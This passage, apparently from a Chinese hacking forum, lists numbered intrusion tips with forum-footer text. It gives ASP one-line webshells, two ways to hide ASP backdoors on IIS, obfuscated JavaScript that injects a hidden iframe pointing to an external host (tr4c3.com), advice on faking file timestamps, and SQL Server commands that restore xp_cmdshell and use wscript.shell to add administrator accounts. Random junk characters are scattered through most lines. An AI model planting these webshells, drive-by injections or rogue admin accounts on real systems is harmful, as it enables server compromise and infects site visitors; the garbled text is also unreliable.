' f+ u/ D9 u& q0 N. q" {b).<%Execute(request("go"))%>+ j8 J2 _2 M* }# d4 g2 L/ r
c).%><%execute request("go")%><%* m0 i% v) u4 u' X6 S5 y
d).<script language=VBScript runat=server>execute request("sb")</Script>; a; L1 J. u* w8 f
e).<%25Execute(request("l"))%25>% I0 V: U) Z; ?4 L2 d
f).<%if request("cmd")<>"" then execute request("pass")%>* n/ n  r# `' b# k

/ P, R+ G2 D$ b$ N: t3 c52、at "12:17" /interactive cmd
( H0 C) k' J5 v. V执行后可以用AT命令查看新加的任务* ~+ z, q- ^( V, J. O; Q5 ]# n% J
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
# d; o7 P* E- I9 E8 B% i$ S0 B5 U" I: R
53、隐藏ASP后门的两种方法' B2 V, ?9 l' ]  J" N8 {
1、建立非标准目录:mkdir images..\2 t/ X: c9 C& i: C
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
  M! f) {4 L+ m8 c9 t8 I8 q通过web访问ASP木马:http://ip/images../news.asp?action=login* L% }- b4 H1 j' Q, @; o
如何删除非标准目录:rmdir images..\ /s% u1 I/ ]$ A3 g6 `* c. f' O# L) y
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:. S; G9 T& B) }; |7 a3 J
mkdir programme.asp' {8 Z; z2 D! W6 m; \
新建1.txt文件内容:<!--#include file=”12.jpg”-->$ G- F+ K7 @" l/ X
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
2 _& G9 v2 p+ r6 y3 F; Hattrib +H +S programme.asp  z3 }  e" R$ z( F0 a! t+ e
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt% H2 w. n5 O5 \4 m  ?; Q
' `' ~2 q) h- _8 Q
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。1 Z& F+ F9 N. ^( I+ A- g: T% ~
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: b/ J6 w0 E8 ~, Y
/ S# O. y6 V1 e) \; D55、JS隐蔽挂马  p/ J3 H, Z/ m9 U1 w. n/ F
1.
+ t1 A  ?$ r6 ^' t# wvar tr4c3="<iframe src=ht";
, t6 S" _/ J2 N  Etr4c3 = tr4c3+"tp:/";& x# t1 w2 v3 F) }4 C
tr4c3 = tr4c3+"/ww";
2 G& G, ^2 G, H2 v2 H1 y  Y, \8 Btr4c3 = tr4c3+"w.tr4";
& Z. \; C! _7 Z) V$ Ntr4c3 = tr4c3+"c3.com/inc/m";) k  H" m! {0 K! {7 S2 B: D% e
tr4c3 = tr4c3+"m.htm style="display:none"></i";
5 Y' w* n  f: t: ^tr4c3 =tr4c3+"frame>'";" l8 v3 P; U% _- X$ t7 e2 q
document.write(tr4c3);
; h  `/ y# Y$ P) P4 Y避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
" i$ N: ^, U) j3 |. I$ Y2 l! n3 O) N1 i* s3 P; Z& X' j
2.
# T+ ]5 o8 l5 D7 M3 r" x转换进制,然后用EVAL执行。如
- @& B4 k9 S( ~eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
0 m" C3 U4 f/ |. Y. [不过这个有点显眼。8 h4 w* c4 Y! Y% E6 J; M
3.
) m, o& R3 b/ n! Y3 _2 j# adocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
( h& a2 q3 L' C2 q) E* V. w9 i2 Z最后一点,别忘了把文件的时间也修改下。
0 P: Q% r3 V9 F- ~1 \, P2 X0 j6 A# L1 O, z  I* J4 `4 Q
56.3389终端入侵常用DOS命令
& d; |' U, n9 l( }) htaskkill taskkill /PID 1248 /t
. P* c) T+ X& j4 P) M, p) i; m4 a8 S; i, n' ]6 Y3 c/ Q
tasklist 查进程
2 N) @0 R  C/ m) o3 p, Z/ ~$ c8 X: D; _$ ?* L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限' d; t( Z  h9 N6 c
iisreset /reboot
% m9 V$ n2 B, H8 A& f9 |tsshutdn /reboot /delay:1    重起服务器  G: |, U) V  T9 X- z5 `+ I
+ _& N! x3 o0 O# M" G3 H
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 F$ X7 ]) `* Z1 G" ?: T$ E: S

% @# s9 d- H6 \/ Tquery user 查看当前终端用户在线情况
6 |, F( H% F$ o* C0 o) n" B+ Y6 f6 N* l
要显示有关所有会话使用的进程的信息,请键入:query process *+ Y: j( F0 k5 G1 {$ \
. t0 n  m% p( K$ {; U# B
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
& W$ Y/ u7 p4 J5 l6 z9 l  x3 x9 g
6 w* C! i& a0 Z3 M4 i# W) C% R: F要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& p! P8 Y2 `, E6 ?& O7 J4 k( h+ T! r+ w- s
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. e7 r. J' Q: I' ?& L; J2 b. N) x3 W# V( z" V5 Q2 C  G! a! g: v
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
0 }$ L+ l  H4 c$ k  u5 U
- Z1 m9 P& l4 M5 S, `! u+ B命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
4 P; X: X7 }; Q
( F( i7 j) O& q: g7 x命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。/ x, L& _6 [" X/ P* ^' ~8 x# R

$ E9 z5 r! m& I8 f& n命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' ~- q: H$ n8 `! o* v% T# V! h

) o3 s) _8 n9 E9 c+ ^56、在地址栏或按Ctrl+O,输入:. d2 h2 Q7 T: u, T' Q4 l
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- l, x2 B' r* w3 a- [4 `3 U+ ^- F& [6 o+ S% Y6 E1 y) w+ [
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。1 N# ^) C; E! T; \. [
; F) d7 }  F* R0 `9 {
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
( }$ e) {, ?$ s2 A8 E& g+ a用net localgroup administrators是可以看到管理组下,加了$的用户的。
& s$ t: x, L: V2 `5 e0 t
5 N* ?, J# w- J58、 sa弱口令相关命令( s8 J8 O1 U; k; R5 @4 X/ {
% d# [: i4 Y& U1 ~+ l* }
一.更改sa口令方法:" l6 R' P! u' a$ d, y7 t
用sql综合利用工具连接后,执行命令:1 k% _4 q( u/ x1 Z
exec sp_password NULL,'20001001','sa'
" h- Q) g, }9 B; Z* Y: V( p(提示:慎用!)6 q3 |6 [1 F& r1 v$ U: m# p
1 L8 C; h. B* e' g6 c
二.简单修补sa弱口令.
# n  [) ]; \' [) P/ b% Q6 B* O1 f  w) r  u
方法1:查询分离器连接后执行:
$ L5 {) z* X* l) Q0 bif exists (select * from
' q5 K: n; \0 m2 k: L3 Kdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
. \, n9 [4 T, Y' HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 S0 y% x  i( t6 D$ N5 t2 U
- @/ |5 o' ^; h  U1 t; X9 U  [exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 P( G2 W& A. r

( @8 l" F& t6 ^3 r! e* f9 H+ GGO! ~! e6 _: s: Z6 B; P
* }6 a4 N$ l  @. H8 A1 i0 G5 y
然后按F5键命令执行完毕4 i2 F- F) l) R' d) C5 j

0 V5 \. q& x8 |6 ?4 [方法2:查询分离器连接后
$ c6 Z: K4 s- ^3 O7 C* j5 R4 D$ b+ p第一步执行:use master4 {( L$ Q4 B& Y4 L, H0 k: C
第二步执行:sp_dropextendedproc 'xp_cmdshell'
( z2 B* k1 K% ]7 `0 W4 L" r' ]然后按F5键命令执行完毕8 c1 j% i# ~3 b+ N. J4 m( W
6 }/ l# X" n* Y+ }) [' a

+ K" Z$ ?  c- p9 |2 o2 E三.常见情况恢复执行xp_cmdshell.
& i: J) |* A% S3 l  i: S
' l% r: a* a8 ?8 s# _
- M( z9 `2 |6 e- f7 K: e1 未能找到存储过程'master..xpcmdshell'.
( _6 i& W1 x, T0 y7 G8 t   恢复方法:查询分离器连接后,
9 z: y: N# E" ~( ~第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 c6 O# }2 z; q* p, b" K! c第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 K" a& ^) }( n. D! K+ b
然后按F5键命令执行完毕1 n8 X* r4 Y5 G9 C+ |1 a

* s( r$ J! ^# X. c/ F+ h2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); w& r0 B* p' C  j" E
恢复方法:查询分离器连接后,
! Z% q/ O' [8 m1 J" @8 ?( H第一步执行:sp_dropextendedproc "xp_cmdshell"# Q: i. l8 t+ b# k9 |" B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 N. ~: U) K; R6 i# D# t然后按F5键命令执行完毕6 y4 g  D7 F. {$ V
# _( e! X- g0 i; d3 J2 R0 r) H
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
/ o( e4 Q4 S; I0 D2 }" Y4 T恢复方法:查询分离器连接后,) e+ n  E* L" u+ W6 U% G' F; ~
第一步执行:exec sp_dropextendedproc 'xp_cmdshell', n9 l5 u7 _: U, ?! t" H1 y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
' L- f' A4 A1 E" F然后按F5键命令执行完毕
5 O" ~, r; N; b
1 [3 a9 q5 X5 \. \. L1 U四.终极方法.
1 d! c# @, U4 w# H4 j* w3 F5 i如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 J8 c" c8 A5 s' ]) z' @& ?4 F
查询分离器连接后,  Q1 w: a3 v: ^
2000servser系统:' A3 J# b$ ^* s/ _/ V) C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
$ r. n2 M8 v% `1 q; S# t! {1 X- W2 A5 l. J8 o5 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. X, s! B! ~! T8 R4 D2 k/ _- S9 ]7 e, @5 y* u1 s" D
xp或2003server系统:2 p) h! D# L3 r
$ n6 y5 D7 x9 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'; n# g- S( A9 w8 C# Y2 }

9 |, }& }1 m) y, I' q5 x; Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'( n' C* j; u9 N, I6 S6 w, i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表